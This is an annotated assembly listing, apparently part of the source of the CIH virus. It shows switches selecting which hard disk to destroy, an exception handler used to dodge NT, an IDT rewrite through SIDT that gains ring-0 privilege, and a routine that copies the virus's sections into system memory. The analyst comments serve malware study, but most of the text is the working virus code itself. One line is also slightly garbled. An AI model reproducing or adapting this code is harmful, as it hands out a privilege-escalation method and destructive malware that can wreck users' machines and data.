📄 cih.asm
; Build-time switches. HookExceptionNumber is used below to pick the interrupt
; vector that gets redirected; FirstKillHardDiskNumber and FileNameBufferSize
; are not referenced in the part of the listing shown here.
IF DEBUG ; is this a debug build?
FirstKillHardDiskNumber = 81h ; debug: kill the second hard disk, "d:"
HookExceptionNumber = 05h ; debug: use interrupt 5
ELSE
FirstKillHardDiskNumber = 80h ; release: kill the first hard disk, "c:"
HookExceptionNumber = 03h ; release: use interrupt 3
ENDIF
FileNameBufferSize = 7fh ; 127; presumably a file-name buffer length, judging by the name only
; *********************************************************
; *********************************************************
; A single segment holds all code and data; every segment register is ASSUMEd
; to it. The matching ENDS is outside this excerpt.
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
; Entry point. Saves ebp, then links a new structured-exception-handling
; record at the head of the chain kept at fs:[0]. The record's handler is
; StopToRunVirusCode; per the author's banners, this is what lets the code
; back out when the table write further down raises an exception (the NT case).
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handling, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2] ; eax = esp-8, where the two pushes at the end of this block leave the new record
xor ebx, ebx ; ebx = 0, so fs:[ebx] addresses fs:[0]
xchg eax, fs:[ebx] ; fs:[0] = new record address; eax = previous fs:[0]
call @0 ; pushes the run-time address of @0 ...
@0:
pop ebx ; ... and pops it again: ebx = where this code is actually loaded
; Run-time address of @0 plus an assembly-time label difference gives an
; absolute address; the author notes the virus uses this pattern heavily.
; Analyst note: a call to the very next instruction followed by a pop is a
; common marker of position-independent code and is worth flagging in triage.
lea ecx, StopToRunVirusCode-@0[ebx] ; ecx = run-time address of StopToRunVirusCode
push ecx ; second dword of the record: handler address
push eax ; first dword of the record: the previous fs:[0] value
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
; Reads the IDT base with SIDT, saves the original entry point of vector
; HookExceptionNumber in ebp, and rewrites the two offset halves of that
; 8-byte entry so the vector leads to MyExceptionHook (defined outside this
; excerpt). The stores only succeed where user-mode code may write to the
; IDT; the author's banners say an exception occurs instead on NT, in which
; case the handler registered at MyVirusStart takes over.
push eax ; reserve one dword for SIDT to fill
sidt [esp-02h] ; Get IDT Base Address: 2-byte limit lands at esp-2, 4-byte base at esp
pop ebx ; ebx = IDT base
add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ; ebx = IDT base + vector*8 + 4 (upper half of the entry)
cli ; disable interrupts before modifying the table entry
mov ebp, [ebx] ; Get Exception Base: upper 16 bits of ebp = offset bits 31..16
mov bp, [ebx-04h] ; Entry Point: bp = offset bits 15..0, so ebp = original handler address
lea esi, MyExceptionHook-@1[ecx] ; ecx still holds the run-time address of StopToRunVirusCode (= @1)
; NOTE(review): the '?' before the semicolon on the next line is not MASM
; syntax; it looks like a mis-encoded whitespace character from the page
; extraction. Left as found.
push esi ?; esi = address of the virus's interrupt routine; saved because the shr below destroys it
mov [ebx-04h], si ; write offset bits 15..0 of the entry
shr esi, 16 ; Modify Exception: bring offset bits 31..16 into si
mov [ebx+02h], si ; Entry Point Address: write offset bits 31..16, so the vector now points at the virus's routine
pop esi ; esi = full address of the routine again
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
; Raises the vector that was just redirected. Per the author's comment this is
; how execution enters ring 0: the processor dispatches through the modified
; IDT entry.
int HookExceptionNumber ; GenerateException ; enter ring 0 by way of the interrupt
; Assembly-time name for the address of the instruction following the int;
; it is not referenced within this excerpt.
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
; Copies the code, which is stored as several separate pieces, into one
; contiguous destination. A table of 8-byte entries is walked downward from
; eax: each entry's dword at -4 is a byte count, and the dword 8 bytes lower
; is the next source pointer. A null pointer ends the walk.
; NOTE(review): eax and edi are not set anywhere in this excerpt; presumably
; the hooked handler (MyExceptionHook, not shown) leaves them loaded. Confirm
; against the full listing.
push esi ; keep esi across the copy
mov esi, eax ; esi points at the start of the virus (first source piece)
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h] ; ecx = size of the current piece
rep movsb ; copy the piece to es:[edi]; per the author, the start of allocated system memory
sub eax, 08h ; step down to the next table entry
mov esi, [eax] ; esi = next source pointer
or esi, esi ; sets ZF when the pointer is null
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ; copy finished
jmp LoopOfMergeAllVirusCodeSection ; copy the next piece
QuitLoopOfMergeAllVirusCodeSection:
pop esi ; restore the value saved before the copy
; *************************************
; * Generate Exception Again *
; *************************************
; Second trip through the redirected vector. What the handler does on this
; pass is decided in MyExceptionHook, which is outside this excerpt.
int HookExceptionNumber ; GenerateException Again
; enter ring 0 once more
; *************************************
; * Let's Restore *
; * Structured Exception Handling *
; *************************************
; Normal-path exit: interrupts back on, then the exception record installed
; at MyVirusStart is unlinked in RestoreSE.
ReadyRestoreSE:
sti ; re-enable interrupts (they were disabled before the IDT write)
xor ebx, ebx ; ebx = 0 so that RestoreSE's fs:[ebx] addresses fs:[0]
jmp RestoreSE ; skip over the exception-path code that follows
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jumps to *
; * Original Application to Run. *
; *************************************
; Exception handler registered at MyVirusStart. Per the banner above, it is
; reached when the earlier code raises an exception, which the author takes
; to mean the host is NT; the virus then gives up and continues into
; RestoreSE on the way back to the original application.
StopToRunVirusCode:
@1 = StopToRunVirusCode ; alias used as the base in the MyExceptionHook-@1[ecx] address calculation
xor ebx, ebx ; ebx = 0
mov eax, fs:[ebx] ; eax = current head of the exception-handler chain
mov esp, [eax] ; esp = first dword of that record (its link to the next record)
; NOTE(review): presumably this puts esp on the record pushed at MyVirusStart,
; so that the pops in RestoreSE remove it. Confirm against the layout of the
; frame the OS dispatcher installs. Execution falls through into RestoreSE.
RestoreSE:
pop dword ptr fs:[ebx]
pop eax